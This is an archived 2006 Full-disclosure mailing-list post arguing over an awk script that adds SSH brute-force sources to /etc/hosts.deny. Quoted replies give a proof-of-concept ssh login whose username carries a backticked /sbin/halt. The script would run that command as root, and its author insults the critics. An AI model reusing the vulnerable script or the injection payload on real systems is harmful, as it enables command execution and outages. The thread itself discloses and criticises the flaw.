Search the archives!
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SSH brute force blocking tool
- From: sil at infiltrated.net (J. Oquendo)
- Subject: [Full-disclosure] SSH brute force blocking tool
- Date: Mon, 27 Nov 2006 16:14:03 -0500
gabriel rosenkoetter wrote:
> On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
>
>> Since you seem to be clueless I'll answer step by step. Here goes idiot.
>> (Sinful to see someone so clueless coming from Gentoo... Guess it goes
>> with the romper room Linux territory)
>>
>
> Uh... actually, no. The provided exploit Will work, and you're the
> idiot.
>
> Here, let me show you.
>
> You do this:
>
>
>> /////
>> awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >>
>> /tmp/hosts.deny
>> diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >>
>> /etc/hosts.deny
>> /////
>>
>> There is no hocus pocus here. Look at /var/log/secure and fine the term
>> "error retrieving" and print the next line, 13th column. Then sort it and
>> print the unique entries into /tmp/hosts.deny. After you do this, compare
>> /tmp/hosts.deny with /etc/hosts.deny and put the differences not in
>> /etc/hosts.deny
>> into /etc/hosts.deny
>>
>
> What will be in column 13 when Tavis does this:
>
>
>> Tavis Ormandy wrote:
>>
>>> Here's an exploit.
>>>
>>> #!/bin/sh
>>> ssh 'foo bar `/sbin/halt`'@victim
>>>
>
> Why, the shelled-out output of `/sbin/halt`!
>
> Or, hey, anything he or I care to put inside backticks. You'll
> execute it blindly, as root, on your system.
>
> Kids, don't use this script. Please.
>
Jesus christ people get stupider by the moment. W/e the script is there
for scrutiny there is no hidden voodoo. If you DO want to see hidden
voodoo here it is,,,
--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5157 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061127/201b4fc5/attachment.bin
- References:
- [Full-disclosure] SSH brute force blocking tool
- From: J. Oquendo
- [Full-disclosure] SSH brute force blocking tool
- From: Tavis Ormandy
- [Full-disclosure] SSH brute force blocking tool
- From: J. Oquendo
- [Full-disclosure] SSH brute force blocking tool
- From: gabriel rosenkoetter
- [Full-disclosure] SSH brute force blocking tool
- Prev by Date: [Full-disclosure] Potentially OT: AJAX article
- Next by Date: [Full-disclosure] SSH brute force blocking tool
- Previous by thread: [Full-disclosure] SSH brute force blocking tool
- Next by thread: [Full-disclosure] SSH brute force blocking tool
- Index(es):